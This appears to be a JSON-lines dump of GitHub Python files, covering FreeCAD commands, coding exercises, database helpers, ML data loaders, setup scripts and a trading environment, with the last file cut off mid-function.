'CmdType':\"ForEdit\"}\n \n def Activated(self):\n try:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.touchEverything(App.ActiveDocument)\")\n _CommandRecomputeDocument().Activated()\n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_ForceRecompute', _CommandForceRecompute())\n\n\nclass _CommandTouch:\n \"Command to touch a feature\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_Touch.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Touch selected features\"),\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Touch selected features: mark selected features as needing recomputing.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n try:\n sel = FreeCADGui.Selection.getSelectionEx()\n if len(sel) == 0:\n infoMessage(\"Touch command\",\n \"'Touch selected features' command. Touches selected objects. 'Touched' means the object was changed and should be recomputed; if nothing is touched, recomputing the document does nothing.\\n\\n\"\n \"Please select objects to be marked as touched first, then invoke this command. If all selected objects are touched already, the 'Touched' state is undone (purged).\")\n return\n n_touched = 0\n for so in sel:\n if 'Touched' in so.Object.State:\n n_touched += 1\n if n_touched < len(sel):\n # not all selected objects are currently touched. Touch the remaining...\n FreeCADGui.doCommand(\"for so in Gui.Selection.getSelectionEx(): lattice2RecomputeLocker.touch(so.Object)\")\n else:\n #all selected objects are already touched. \n FreeCADGui.doCommand(\"for so in Gui.Selection.getSelectionEx(): so.Object.purgeTouched()\")\n \n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_Touch', _CommandTouch())\n\nexportedCommands = [\n \"Lattice2_RecomputeLocker_MakeFeature\",\n \"Lattice2_RecomputeLocker_LockRecomputes\",\n \"Lattice2_RecomputeLocker_UnlockRecomputes\",\n \"Lattice2_RecomputeLocker_RecomputeFeature\",\n \"Lattice2_RecomputeLocker_RecomputeDocument\",\n \"Lattice2_RecomputeLocker_ForceRecompute\",\n \"Lattice2_RecomputeLocker_Touch\"\n ]\ntry:\n if float(App.Version()[1]) >= 17.0:\n exportedCommands.remove(\"Lattice2_RecomputeLocker_MakeFeature\")\nexcept Exception as err:\n App.Console.PrintWarning(\"Failed to parse version string: {v}\".format(v= App.Version()[1]))\n #assume modern\n exportedCommands.remove(\"Lattice2_RecomputeLocker_MakeFeature\")\n\n \nclass CommandRecomputeGroup:\n def GetCommands(self):\n global exportedCommands\n return tuple(exportedCommands)\n\n def GetDefaultCommand(self): # return the index of the tuple of the default command. \n return 0\n\n def GetResources(self):\n return { 'MenuText': 'Lattice recompute control:', \n 'ToolTip': 'Document recompute controlling tools from Lattice2 workbench',\n 'CmdType':\"ForEdit\"}\n \n def IsActive(self): # optional\n return App.ActiveDocument is not None\nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLockerGroup', CommandRecomputeGroup())\n \n \ndef msgbox(strmsg):\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(strmsg)\n mb.setWindowTitle(\"debug\")\n mb.exec_()\n","repo_name":"DeepSOIC/Lattice2","sub_path":"lattice2RecomputeLocker.py","file_name":"lattice2RecomputeLocker.py","file_ext":"py","file_size_in_byte":18105,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"39"} +{"seq_id":"16038854214","text":"sandwich_orders = ['grilled cheese', 'pastrami', 'grilled chicken', 'pastrami', 'club', 'reuben', 'pastrami']\nfinished_sandwiches = []\nprint(\"Unfortunately the deli has run out of pastrami\")\nwhile 'pastrami' in sandwich_orders:\n sandwich_orders.remove('pastrami')\n\nwhile sandwich_orders:\n sandwich_made = sandwich_orders.pop()\n print(\"I made your \" + sandwich_made.title() + \" sandwich\")\n finished_sandwiches.append(sandwich_made)\n\nprint(\"Sandwiches made to order:\")\nfor sandwich in finished_sandwiches:\n print(sandwich.title())\n","repo_name":"mentalclear/PythonCrashCourse","sub_path":"project/chapter7/exercises/exercise7_9.py","file_name":"exercise7_9.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3318637697","text":"from mysql_connection import database_connection\nfrom datetime import datetime\n \ndef create_table():\n try:\n connection = database_connection()\n if connection.is_connected():\n print('DATABASE CONNECTED')\n query = '''\n create table python(\n id int auto_increment,\n first_name varchar(10),\n last_name varchar(10),\n date_time datetime,\n primary key(id)\n )'''\n cursor = connection.cursor()\n cursor.execute(query)\n print(\"Table Sucessfully Created\")\n except Error as err:\n print(\"An error has occured:\", err)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n print(\"Database Connection Closed.\")\n\ndef insert_many_records(table_name, records):\n try:\n connection = database_connection()\n if connection.is_connected():\n query = '''\n insert into {0}(first_name, last_name, date_time)\n values (%s, %s, %s)\n '''.format(table_name)\n cursor = connection.cursor()\n cursor.executemany(query, records)\n connection.commit()\n print(f\"Total {cursor.rowcount} records inserted.\")\n except Error as err:\n print(\"An error has occured:\", err)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n print(\"Database Conection Closed.\")\n \n\n\n# DRIVER CODE\nif __name__ == '__main__':\n #create_database()\n\n records = [\n ('abc', 'bcc', datetime.now()),\n ('mnm', 'nnn', datetime.now()),\n ('lkio', 'pop', datetime.now())\n ]\n insert_many_records('python', records)\n","repo_name":"Susantade/Newrepo","sub_path":"mysql_db1.py","file_name":"mysql_db1.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9124096168","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom time import sleep\nimport sys\nimport cv2 as cv\nimport argparse\nimport numpy as np\nimport RPi.GPIO as GPIO\n\n#from https://stackoverflow.com/questions/35180764/opencv-python-image-too-big-to-display\ndef ResizeWithAspectRatio(image, width=None, height=None, inter=cv.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n\n return cv.resize(image, dim, interpolation=inter)\n\na = 0\nvid = cv.VideoCapture('4mm_hole_test2.MP4')\n# fourcc = cv.VideoWriter_fourcc(*'MPEG')\n# out = cv.VideoWriter('output.avi',fourcc, 20.0, (640,480))\nwhile (vid.isOpened()):\n ret, frame = vid.read()\n\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n\n rows = gray.shape[0]\n circles = cv.HoughCircles(gray, cv.HOUGH_GRADIENT, 1, rows / 8,\n param1=200, param2=30,\n minRadius=1, maxRadius=30)\n\n if circles is not None:\n circles = np.uint16(np.around(circles))\n if len(circles[0, :]) == 1:\n a = a + 1\n for i in circles[0, :]: \n center = (i[0], i[1])\n cv.circle(frame, center, i[2], (255, 0, 255), 3)\n resize = ResizeWithAspectRatio(frame, height=540)\n filename = 'test2-out' + str(a) + '.jpg'\n cv.imwrite(filename, resize)\n# out.write(frame)\n if a == 20:\n quit() \n \n\n","repo_name":"dmackey199/IPPD_ImgProc","sub_path":"test-with-real-vid/circle-vid.py","file_name":"circle-vid.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32187090930","text":"from crm import models\nfrom django import forms\n\n\nclass BjModelForm(forms.ModelForm):\n class Meta:\n model = models.ClassList\n fields = '__all__'\n widgets = {\n 'course': forms.Select(attrs={'class': 'col-sm-10 form-control'}),\n 'num': forms.TextInput(attrs={'class': 'col-sm-10 form-control', 'placeholder': '第几期'}),\n 'teacher': forms.SelectMultiple(attrs={'class': 'col-sm-10 form-control'}),\n }\n error_messages = {\n 'num': {\n 'required': '此列不能为空',\n }\n }","repo_name":"cnmhl/crm","sub_path":"crm/forms/bj.py","file_name":"bj.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42264325891","text":"# -*- coding: utf-8 -*-\n'''\nEx3_3. 数据随机存储,掌握os与random模块的用法以及文件读写方法。\n 定义一个函数fs(dirname,s),其中参数dirname表示文件夹路径名,s为字符串,表示需要保存的数据。\n 函数fs的功能是随机地将字符串s存储到dirname路径下某个文本文件(“*.txt”文件)中。\n 假如dirname路径下已有”a.txt”、 ”b.txt”、 ”c.txt”三个或更多文本文件,\n 字符串s可能被保存到”a.txt”,或”b.txt”,或 ”c.txt”,或其他文件,机会是相同的,并且不能覆盖原有的文本文件。\n 如果dirname路径下不存在任何文本文件,则新创建“new.txt”文件来保存字符串s。\n'''\nimport os\nimport random\n\n\ndef fs(dirname, s):\n ans = list()\n for file in os.listdir(dirname):\n ex = os.path.splitext(file)[1]\n if ex == '.txt':\n ans.append(file)\n if len(ans) == 0:\n f = open('new.txt', 'a', encoding='utf-8')\n f.write(s)\n f.close\n else:\n i = int(random.random() * len(ans))\n f = open(ans[i], 'a', encoding='utf-8')\n f.write(s)\n f.closed\n\n\nls = input('Please input the path:')\ns = input('Please input the string:')\nfs(ls, s)\n","repo_name":"shuzhiwen/study-work","sub_path":"language-python/3.综合实验/Ex3_3.py","file_name":"Ex3_3.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9039818536","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n# version 1 - create a head\ndef removeElements(head: Optional[ListNode], val: int) -> Optional[ListNode]:\n if head == None:\n return head\n p = ListNode(-1, head)\n result = p\n while p.next:\n if p.next.val == val:\n p.next = p.next.next\n else:\n p = p.next\n return result.next\n\n# version 2 - remove head if equal to val\ndef removeElements(self, head: Optional[ListNode], val: int) -> Optional[ListNode]:\n if head == None:\n return head\n while head and head.val == val:\n head = head.next\n current = head\n while current:\n if current.next and current.next.val == val:\n current.next = current.next.next\n else:\n current = current.next\n return head\n\n# version 3\ndef removeElements(head: Optional[ListNode], val: int) -> Optional[ListNode]:\n if head == None:\n return head\n while head and head.val == val:\n head = head.next\n current = head\n while current:\n # current.next exists when current exists\n while current.next and current.next.val == val:\n current.next = current.next.next\n current = current.next\n return head","repo_name":"wxy991015/LeetCode","sub_path":"Easy/Remove Linked List Elements.py","file_name":"Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40820578834","text":"import submarine\nfrom os import environ\nfrom submarine.store.database.models import SqlMetric, SqlParam\nfrom submarine.tracking import utils\n\nJOB_NAME = \"application_123456789\"\n\n\ndef test_log_param(tracking_uri_mock):\n environ[\"SUBMARINE_JOB_NAME\"] = JOB_NAME\n submarine.log_param(\"name_1\", \"a\", \"worker-1\")\n\n tracking_uri = utils.get_tracking_uri()\n store = utils.get_sqlalchemy_store(tracking_uri)\n\n # Validate params\n with store.ManagedSessionMaker() as session:\n params = session \\\n .query(SqlParam) \\\n .options() \\\n .filter(SqlParam.job_name == JOB_NAME).all()\n assert params[0].key == \"name_1\"\n assert params[0].value == \"a\"\n assert params[0].worker_index == \"worker-1\"\n assert params[0].job_name == JOB_NAME\n\n\ndef test_log_metric(tracking_uri_mock):\n environ[\"SUBMARINE_JOB_NAME\"] = JOB_NAME\n submarine.log_metric(\"name_1\", 5, \"worker-1\")\n submarine.log_metric(\"name_1\", 6, \"worker-2\")\n\n tracking_uri = utils.get_tracking_uri()\n store = utils.get_sqlalchemy_store(tracking_uri)\n\n # Validate params\n with store.ManagedSessionMaker() as session:\n metrics = session \\\n .query(SqlMetric) \\\n .options() \\\n .filter(SqlMetric.job_name == JOB_NAME).all()\n assert len(metrics) == 2\n assert metrics[0].key == \"name_1\"\n assert metrics[0].value == 5\n assert metrics[0].worker_index == \"worker-1\"\n assert metrics[0].job_name == JOB_NAME\n assert metrics[1].value == 6\n assert metrics[1].worker_index == \"worker-2\"\n","repo_name":"pingsutw/Submarine-SDK","sub_path":"tests/tracking/test_tracking.py","file_name":"test_tracking.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13435515188","text":"import glob\nimport os\nimport os.path as osp\nimport sys\n\nimport torch\nfrom setuptools import find_packages, setup\nfrom torch.__config__ import parallel_info\nfrom torch.utils.cpp_extension import (CUDA_HOME, BuildExtension, CppExtension,\n CUDAExtension)\n\nWITH_CUDA = torch.cuda.is_available() and CUDA_HOME is not None\nif os.getenv('FORCE_CUDA', '0') == '1':\n WITH_CUDA = True\nif os.getenv('FORCE_ONLY_CPU', '0') == '1':\n WITH_CUDA = False\n\n\ndef get_extensions():\n Extension = CppExtension\n define_macros = []\n libraries = []\n extra_compile_args = {'cxx': []}\n extra_link_args = []\n\n info = parallel_info()\n if 'parallel backend: OpenMP' in info and 'OpenMP not found' not in info:\n extra_compile_args['cxx'] += ['-DAT_PARALLEL_OPENMP']\n if sys.platform == 'win32':\n extra_compile_args['cxx'] += ['/openmp']\n else:\n extra_compile_args['cxx'] += ['-fopenmp']\n else:\n print('Compiling without OpenMP...')\n\n if WITH_CUDA:\n Extension = CUDAExtension\n define_macros += [('WITH_CUDA', None)]\n nvcc_flags = os.getenv('NVCC_FLAGS', '')\n nvcc_flags = [] if nvcc_flags == '' else nvcc_flags.split(' ')\n nvcc_flags += ['-arch=sm_35', '--expt-relaxed-constexpr']\n extra_compile_args['nvcc'] = nvcc_flags\n\n extensions_dir = osp.join('csrc')\n main_files = glob.glob(osp.join(extensions_dir, '*.cpp'))\n extensions = []\n for main in main_files:\n name = main.split(os.sep)[-1][:-4]\n\n sources = [main]\n\n path = osp.join(extensions_dir, 'cpu', f'{name}_cpu.cpp')\n if osp.exists(path):\n sources += [path]\n\n path = osp.join(extensions_dir, 'cuda', f'{name}_cuda.cu')\n if WITH_CUDA and osp.exists(path):\n sources += [path]\n\n extension = Extension(\n 'torch_geometric_autoscale._' + name,\n sources,\n include_dirs=[extensions_dir],\n define_macros=define_macros,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args,\n libraries=libraries,\n )\n extensions += [extension]\n\n return extensions\n\n\ninstall_requires = ['ogb', 'hydra-core']\nsetup_requires = ['pytest-runner']\ntests_require = ['pytest', 'pytest-cov']\n\nsetup(\n name='torch_geometric_autoscale',\n version='0.0.0',\n author='Matthias Fey',\n author_email='matthias.fey@tu-dortmund.de',\n description='PyGAS: Auto-Scaling GNNs in PyTorch Geometric',\n python_requires='>=3.6',\n install_requires=install_requires,\n setup_requires=setup_requires,\n tests_require=tests_require,\n extras_require={'test': tests_require},\n ext_modules=get_extensions(),\n cmdclass={\n 'build_ext':\n BuildExtension.with_options(no_python_abi_suffix=True, use_ninja=False)\n },\n packages=find_packages(),\n)\n","repo_name":"rusty1s/pyg_autoscale","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"39"} +{"seq_id":"25317229109","text":"# -*- coding: utf-8 -*-\n\"\"\"Library Without Borders box in Detroit, USA\"\"\"\nfrom .idb import * # noqa\nfrom django.utils.translation import ugettext_lazy as _\n\nIDEASCUBE_NAME = u\"Library Whitout Border Detroit\"\nIDEASCUBE_PLACE_NAME = _(\"city\")\nCOUNTRIES_FIRST = ['US']\nTIME_ZONE = None\nLANGUAGE_CODE = 'en'\nLOAN_DURATION = 14\nMONITORING_ENTRY_EXPORT_FIELDS = ['serial', 'user_id', 'birth_year', 'gender']\nUSER_FORM_FIELDS = (\n ('Ideasbox', ['serial', 'box_awareness']),\n (_('Personal informations'), ['short_name', 'full_name', 'birth_year', 'gender', 'id_card_number']), # noqa\n (_('Family'), ['marital_status', 'family_status', 'children_under_12', 'children_under_18', 'children_above_18']), # noqa\n (_('In the town'), ['current_occupation', 'school_level']),\n (_('Language skills'), ['en_level']),\n)\n\nHOME_CARDS = STAFF_HOME_CARDS + [\n {\n 'id': 'blog',\n },\n {\n 'id': 'library',\n },\n {\n 'id': 'mediacenter',\n },\n {\n 'id': 'wikipedia.old',\n },\n {\n 'id': 'khanacademy',\n },\n {\n 'id': 'gutenberg.old',\n },\n]\n","repo_name":"blqn/ideascube","sub_path":"ideascube/conf/idb_lwb_detroit_usa.py","file_name":"idb_lwb_detroit_usa.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"17106552965","text":"import distribute_setup\ndistribute_setup.use_setuptools()\n\nimport os\nfrom setuptools import setup, find_packages\n\ndef find_files(dirname):\n files = []\n for entryname in os.listdir(dirname):\n pathname = \"%s/%s\" % (dirname, entryname)\n if os.path.isfile(pathname):\n files.append(pathname)\n elif os.path.isdir(pathname):\n files += find_files(pathname) \n return files\n \nsetup(\n name='Memopol',\n version = '1.99.1',\n author = 'The memopol project',\n author_email = 'deubeulyou@gmail.com',\n description = 'Memoire Politique',\n long_description = open('README.txt').read(),\n license = 'LICENSE.txt',\n url = 'http://projets.lqdn.fr/projects/mempol',\n packages = find_packages(),\n include_package_data = True,\n scripts = find_files('bin'),\n install_requires = open('requirements.txt').read(),\n extras_require = {\n 'test': open('requirements-test.txt').read()\n }\n)\n","repo_name":"mparisot-wescale/memopol2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4635742558","text":"import torch\nimport torchmetrics.functional.classification as metrics\nfrom torch import Tensor\nfrom typing import Literal\n\n\nclass Evaluator:\n \"\"\"Evaluate experiment results with given metrics\"\"\"\n def __init__(self, use_metrics: list[Literal['AUC', 'AP']], num_classes: int):\n super(Evaluator, self).__init__()\n self.metric_results: dict[str, list] = {metric: [] for metric in use_metrics}\n self.__num_classes = num_classes\n\n def evaluate_test(self, predicts: Tensor, target: Tensor, test_mask: Tensor):\n \"\"\"Evaluate on the test set\"\"\"\n for metric, results in self.metric_results.items():\n result = self._evaluate(metric, predicts, target, test_mask)\n results.append(result.item())\n yield f\"{metric}: {result:.6f}, \"\n\n def get_final_results(self):\n \"\"\"Return final results by 'mean ± std'\"\"\"\n for metric, results in self.metric_results.items():\n final = torch.tensor(results)\n yield f\"Final {metric}: {final.mean().item():.4f} ± {final.std(dim=0).item():.4f}, \"\n\n def _evaluate(self,\n metric_name: str,\n predicts: Tensor,\n target: Tensor,\n mask: Tensor):\n if metric_name == 'AUC':\n return metrics.multiclass_auroc(predicts[mask], target[mask],\n num_classes=self.__num_classes)\n elif metric_name == 'AP':\n return metrics.multiclass_average_precision(\n predicts[mask], target[mask],\n num_classes=self.__num_classes)\n else:\n raise ValueError('Invalid metric name')\n\n def __str__(self):\n return f\"Results: {self.metric_results}\"\n","repo_name":"HotranLandoler/baselines-lab","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74035875314","text":"import math\nimport torch\nimport time\nimport numpy as np\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom local_logger import Logger\nfrom torch.nn import Parameter\nfrom torchvision import datasets, transforms\n\n# Load cifar 10\ndef get_cifar10(batch_size):\n trsnform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n\n return train_loader, test_loader\n\n# Load MNIST\ndef get_mnist(batch_size):\n trsnform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./data', train=True, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./data', train=False, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n\n return train_loader, test_loader\n\n# Randonly Labeling Cifar10\nclass CIFAR10RandomLabels(datasets.CIFAR10):\n def __init__(self, corrupt_prob=0.0, num_classes=10, **kwargs):\n super(CIFAR10RandomLabels, self).__init__(**kwargs)\n self.n_classes = num_classes\n if corrupt_prob > 0:\n self.corrupt_labels(corrupt_prob)\n \n def corrupt_labels(self, corrupt_prob):\n labels = np.array(self.train_labels if self.train else self.test_labels)\n np.random.seed(12345)\n mask = np.random.rand(len(labels)) <= corrupt_prob\n rnd_labels = np.random.choice(self.n_classes, mask.sum())\n labels[mask] = rnd_labels\n labels = [int(x) for x in labels]\n \n if self.train:\n self.train_labels = labels\n else:\n self.test_labels = labels","repo_name":"dsxxxk/CS5339","sub_path":"Project/Code/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"34767761328","text":"from flask import Flask, request, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/uploads', methods=['GET', 'POST'])\ndef uploads():\n if request.method == 'GET':\n return render_template('index.html')\n if request.method == 'POST':\n return 'success, url'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"fengzhiziLy/PythonFlask","sub_path":"01class_view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39827285485","text":"from typing import List, Tuple, Union\n\nimport pandas as pd\n\nfrom experimenter.data import DataProvider\nfrom experimenter.utils import text\nfrom experimenter.utils import utils as U\n\n\nclass LMProvider(DataProvider):\n \"\"\"Data Provider for Language Modeling Task\"\"\"\n\n def __init__(self, config):\n super(LMProvider, self).__init__(config)\n # Setup encoding pipeline\n cleaner = text.clean_text()\n char_tokenizer = text.Tokenizer(sep=\"\")\n\n enc = text.Encoder(update_vocab=True, no_special_chars=False)\n # label_enc = text.Encoder(update_vocab=True, no_special_chars=True)\n as_is = U.chainer(funcs=[lambda x: x])\n\n self.encoder = {}\n self.encoder[\"inp\"] = [U.chainer(funcs=[cleaner, char_tokenizer, enc])]\n self.encoder[\"label\"] = self.encoder[\"inp\"]\n self.encoder[\"pred\"] = self.encoder[\"inp\"]\n self.encoder[\"mask\"] = [as_is]\n self.encoder[\"out\"] = self.encoder[\"mask\"]\n self.encoder[\"meta\"] = as_is\n\n self.decoder = {}\n self.decoder[\"inp\"] = [U.chainer(funcs=[enc.decode, char_tokenizer.detokenize])]\n self.decoder[\"label\"] = self.decoder[\"inp\"]\n self.decoder[\"pred\"] = self.decoder[\"inp\"]\n self.decoder[\"mask\"] = [as_is]\n self.decoder[\"out\"] = [as_is]\n self.decoder[\"meta\"] = as_is\n\n # Process data\n raw_data = self.upload_data()\n raw_data = self._create_splits(raw_data)\n s = [self.__call__(d, list_input=True) for d in raw_data]\n enc.freeze()\n config[\"processor\"][\"params\"][\"vocab_size\"] = len(\n enc.vocab\n ) # Needs changing, we might have multiple vocabs\n config[\"processor\"][\"params\"][\"padding_indx\"] = enc.get_padding_indx()\n\n self.data_raw = raw_data\n self.data = tuple([self._to_batches(split) for split in s])\n self.sample_data_raw = self.data_raw[0][1]\n self.sample_data_processed = s[0][1]\n\n def upload_data(\n self, **kwargs\n ) -> List[\n Tuple[List[Union[List[int], int]], List[Union[List[int], int]], List[int]]\n ]:\n \"\"\"Read data file and returns list of sentences with S and E symbols\n\n currently, reads csv that contains two columns s1, s2 and stance with sentences in each\n \"\"\"\n data_in = pd.read_csv(self.input_path[0])\n data_in[\"stance\"] = data_in[\"stance\"].astype(str)\n\n def f(x):\n return \"S\" + x + \"E\"\n\n s1_data = [f(x) for x in data_in[\"s1\"]]\n s2_data = [f(x) for x in data_in[\"s2\"]]\n\n data = [\n {\"inp\": [d[:-2]], \"label\": [d[1:]], \"mask\": [1]}\n for d, d2 in zip(s1_data, s2_data)\n ]\n\n return data\n","repo_name":"jkhouja/experimenter","sub_path":"experimenter/LM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"71759118195","text":"# 给你一个由 n 个整数组成的数组 nums ,和一个目标值 target 。请你找出并返回满足下述全部条件且不重复的四元组 [nums[a], nums[b], nums[c], nums[d]] (若两个四元组元素一一对应,则认为两个四元组重复):\n#\n# 0 <= a, b, c, d < n\n# a、b、c 和 d 互不相同\n# nums[a] + nums[b] + nums[c] + nums[d] == target\n# 你可以按 任意顺序 返回答案 。\n#\n#\n#\n# 示例 1:\n#\n# 输入:nums = [1,0,-1,0,-2,2], target = 0\n# 输出:[[-2,-1,1,2],[-2,0,0,2],[-1,0,0,1]]\n# 示例 2:\n#\n# 输入:nums = [2,2,2,2,2], target = 8\n# 输出:[[2,2,2,2]]\n#\n#\n# 提示:\n#\n# 1 <= nums.length <= 200\n# -109 <= nums[i] <= 109\n# -109 <= target <= 109\n\nfrom collections import Counter, defaultdict\nfrom math import inf\nfrom typing import List\nclass Solution:\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n n = len(nums)\n ans = []\n for i in range(n):\n if i > 0 and nums[i] == nums[i - 1]: continue\n for j in range(i + 1, n):\n if j > i + 1 and nums[j] == nums[j - 1]: continue\n rid = n - 1\n for k in range(j + 1, n):\n if k >= rid: break\n if k > j + 1 and nums[k] == nums[k - 1]: continue\n s = nums[i] + nums[j] + nums[k]\n left = target - s\n while rid > k and left <= nums[rid]:\n if left == nums[rid]:\n ans.append([nums[i], nums[j], nums[k], nums[rid]])\n break\n rid -= 1\n\n return ans\n\n\n\nso = Solution()\nprint(so.fourSum(nums = [-3,-2,-1,0,0,1,2,3], target = 0))\nprint(so.fourSum(nums = [1,0,-1,0,-2,2], target = 0))\nprint(so.fourSum(nums = [2,2,2,2,2], target = 8))\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/0-100/019fourSum.py","file_name":"019fourSum.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73603351154","text":"#!/usr/bin/env python\n\nfrom PIL import Image\nfrom cached_property import cached_property\nfrom exchange_data.data.orderbook_frame import OrderBookFrame\nfrom gym.spaces import Discrete\nfrom matplotlib import pyplot as plt\nfrom tgym.envs.orderbook import OrderBookTradingEnv\n\nimport click\nimport matplotlib\nimport numpy as np\nimport random\nimport cv2\nimport alog\n\n\n\n\nclass OrderBookFrameEnv(OrderBookFrame, OrderBookTradingEnv):\n random_frame_start: bool = False\n\n def __init__(\n self,\n show_img=False,\n frame_width=224,\n macd_diff_enabled=False,\n random_frame_start=False,\n trial=None,\n num_env=1,\n **kwargs\n ):\n super().__init__(action_space=Discrete(2), **kwargs)\n OrderBookTradingEnv.__init__(\n self, frame_width=frame_width, action_space=Discrete(2), **kwargs\n )\n self.plot_count = 0\n\n if random_frame_start:\n self.random_frame_start = random_frame_start\n self._show_img = show_img\n\n if not self._show_img:\n matplotlib.use(\"agg\")\n\n self.trial = trial\n self.num_env = num_env\n kwargs[\"batch_size\"] = 1\n self.macd_diff_enabled = macd_diff_enabled\n self.observations = None\n self.prune_capital = 1.01\n self.total_steps = 0\n self.was_reset = False\n self.macd_diff = None\n\n @property\n def done(self):\n return self._done\n\n @done.setter\n def done(self, value):\n self._done = value\n\n @property\n def best_bid(self):\n return self._best_bid\n\n @property\n def best_ask(self):\n return self._best_ask\n\n @cached_property\n def frame(self):\n return super().frame\n\n @property\n def frame_start(self):\n if self.random_frame_start:\n return random.randint(0, len(self.frame))\n else:\n return 0\n\n def _get_observation(self):\n self.max_steps = len(self.frame)\n\n for i in range(self.frame_start, len(self.frame)):\n row = self.frame.iloc[i]\n best_ask = row.best_ask\n best_bid = row.best_bid\n frame = row.orderbook_img\n # macd_diff = row.macd_diff\n timestamp = row.name.to_pydatetime()\n\n yield timestamp, best_ask, best_bid, frame\n\n def get_observation(self):\n if self.observations is None:\n self.observations = self._get_observation()\n\n try:\n timestamp, best_ask, best_bid, frame = next(self.observations)\n except StopIteration:\n self.observations = None\n self.done = True\n return self.last_observation\n\n self._best_ask = best_ask\n self._best_bid = best_bid\n\n self.position_history.append(self.position.name[0])\n\n self.last_datetime = str(timestamp)\n\n self._last_datetime = timestamp\n\n if self.current_trade:\n self.position_pnl_history.append(self.current_trade.pnl)\n\n ob_img = self.plot_orderbook(frame)\n\n if self._show_img:\n self.show_img(ob_img)\n\n ob_img = ob_img[:, :, :3]\n ob_img = np.expand_dims(ob_img, axis=0)\n\n self.last_observation = ob_img\n\n return self.last_observation\n\n def plot_orderbook(self, data):\n fig, frame = plt.subplots(1, 1, figsize=(1, 1), dpi=self.frame_width)\n # frame.axis('off')\n frame = frame.twinx()\n plt.autoscale(tight=True)\n 